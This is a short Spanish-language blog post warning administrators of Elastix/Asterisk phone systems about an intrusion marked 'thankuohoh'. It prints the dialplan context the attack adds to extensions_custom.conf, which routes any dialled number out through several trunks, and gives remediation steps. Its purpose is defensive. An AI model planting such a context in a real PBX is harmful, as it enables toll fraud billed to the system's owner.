thankuohoh

Esta es una nueva vulnerabilidad que aún no ha sido documentada y de la cual no he encontrado suficiente información, solo he determinado que el acceso se da a traves de puerto del servicio: portmap, por lo que lo mejor es deshabilitar ese puerto.

Esta vulnerabilidad adiciona a tu archivo /etc/asterisk_extensions_custom.conf las siguientes lineas:

[thanku-outcall]; thankuohoh
exten => _.,1,Macro(user-callerid,LIMIT,EXTERNAL,); thankuohoh
exten => _.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})}); thankuohoh
exten => _.,n,Set(_NODEST=); thankuohoh
exten => _.,n,Macro(dialout-trunk,2,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,3,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(dialout-trunk,4,${EXTEN},,on); thankuohoh
exten => _.,n,Macro(outisbusy,); thankuohoh


En ocasiones lo he visto actuar con un script de sipvicious, lo mas sencillo aqui es comentar todo lo que esta debajo del contexto, cerrar el puerto portmap, mover tu puerto de ssh a uno alto y cambiar todas tus contraseñas de inmediato.


Parece ser que el origen del problema es de A2Billing, aqui pueden ver mas información:

http://bugs.elastix.org/view.php?id=2169


Comentarios

Entradas populares de este blog

Crear un codigo para escuchar una llamada en tiempo real

Limitar el tiempo de una llamada por extensión para troncal G0

Como deshabilitar temporalmente la opción de "Weak Passsword Deteccion" en un sistema Elastix